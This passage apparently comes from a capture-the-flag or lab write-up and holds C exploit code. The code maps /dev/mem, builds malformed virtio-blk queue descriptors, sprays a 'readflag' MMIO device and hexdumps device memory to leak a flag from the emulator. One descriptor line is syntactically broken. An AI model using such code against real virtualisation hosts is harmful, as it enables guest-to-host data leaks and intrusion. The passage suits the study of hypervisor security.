    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset device
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


    // alloc dma memory
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // init queue
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);

    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}

void spray(){
    for(int i = 0xfff; i > 0x28; i-=4){
        mmio_write32((void*)readflag_mmio, i);
    }
}

void hexdump(void* addr, size_t size){
    // dump 4 bytes per time
    for(int i = 0; i < size; i+=4){
        uint32_t val = *(volatile uint32_t*)(addr+i);
        for(int j = 0; j < 4; j++){
            uint8_t chr = (val >> (j*8)) & 0xff;
            if(chr >= 0x20 && chr <= 0x7e){
                putchar(chr);
            }else{
                putchar('?');
            }
        }
    }
}

int main(){
    setbuf(stdout, NULL);
    init_readflag();
    init_virtio();

    volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
    req->type = 0xffffffffu;
    req->sector = 0;
    req->reserved = 0;

    queue_desc[0].addr = (size_t)req;
    queue_desc[0].len = 0x10;
    queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
    queue_desc[0].next = 1;
    queue_desc[1].addr = (size_t);
    queue_desc[1].len = 0xfff;
    queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
    queue_desc[1].next = 2;
    queue_desc[2].addr = (size_t)dma_data + 0xa00;
    queue_desc[2].len = 1;
    queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
    queue_desc[2].next = 0;

    queue_avail->flags = 1;
    queue_avail->ring[0] = 0;
    queue_avail->idx = 1;
    mb();
    mmio_write8((void*)virtio_isr_mmio, 1);
    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
    puts("--------------------------------");
    for(int i = 0; i < 0x100; i+=4){
        spray();
    }
    mmio_write16(notify_addr, 0);
    puts("--------------------------------");
    hexdump((char*)virtio_common_mmio + 0x000, 0x100);

    munmap(dma_mem, 0x3000);
    munmap(virtio_mmio, 0x4000);
    munmap(readflag_mmio, 0x1000);
}

References


  1. Virtual I/O Device (VIRTIO) Version 1.1↩︎

  2. Virtqueues and virtio ring: How the data travels↩︎

  3. Memory-mapped I/O and port-mapped I/O↩︎